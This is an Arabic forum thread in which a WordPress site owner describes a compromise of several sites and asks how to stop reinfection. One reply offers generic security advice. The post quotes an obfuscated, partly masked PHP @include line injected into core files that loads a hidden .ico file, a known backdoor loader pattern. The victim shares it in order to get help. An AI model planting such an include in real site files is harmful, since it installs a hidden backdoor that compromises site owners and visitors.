اذهب إلى المحتوى
  • 0

تنظيف ووردبريس بعد الاختراق وسد الثغرات

Tarek Al lahaam

السؤال

سلامات جميعاً

انا استخدم ووردبريس على استضافة بلوهوست وقمت بربط 10 دومينات على هذا الحساب، من فترة اكتشفت عملية اختراق تقوم بتحويل روابط المواقع الى مواقع متعددة.

قمت بتحديث جميع الاضافات البرمجية وحذف الاكواد الموجودة ضمن الملفات، لكن بعد عدة ايام عند المراجعة وجدت انه تم استبدال العديد من الملفات بملفات اخرى فيها الكود التالي:

/*dc84b*/

@include "\057h\157m\*********\143/\160u\142l\151c\137h\164m\154/\167p\055i\156c\154u\144e\163/\122e\161u\145s\164s\057.\067e\0700\1418\062b\056i\143o";

/*dc84b*/

الملفات المستبدلة:

index.php

wp-config.php

wp-settings.php

بعد فك التشفير وجد ملف بعنوان .7e80a82b.ico لم استطيع فك التشفير حتى اتمكن من مشاهدة محتوياته.

سؤالي هو كيف اقوم بمنع حدوث هذا الأمر مرة اخرى ارجو منكم المساعدة مع العلم انه يوجد على الاستضافة اكتر من 10 نسخ ووردبريس منصبة ويتم العمل عليها.

الصورة المرفقة لمحتوى ملف .7e80a82b.ico

 

Capture.JPG

رابط هذا التعليق
شارك على الشبكات الإجتماعية

Recommended Posts

  • 0

تحياتى

Hosting Company

سواء كانت بلو هوست او جودادى او هوست جاتور

بتوفر لك الحماية لكن بمقابل زيادة عن الهوستنج العادى

وراسل الدعم الفنى

هيفيدك أكتر

والورد بريس فيه بلج أن كتيرة بتساعدك على حماية موقعك

بالتوفيق

رابط هذا التعليق
شارك على الشبكات الإجتماعية

انضم إلى النقاش

يمكنك أن تنشر الآن وتسجل لاحقًا. إذا كان لديك حساب، فسجل الدخول الآن لتنشر باسم حسابك.

زائر
أجب على هذا السؤال...

×   لقد أضفت محتوى بخط أو تنسيق مختلف.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   جرى استعادة المحتوى السابق..   امسح المحرر

×   You cannot paste images directly. Upload or insert images from URL.

  • إعلانات

  • تابعنا على



×
×
  • أضف...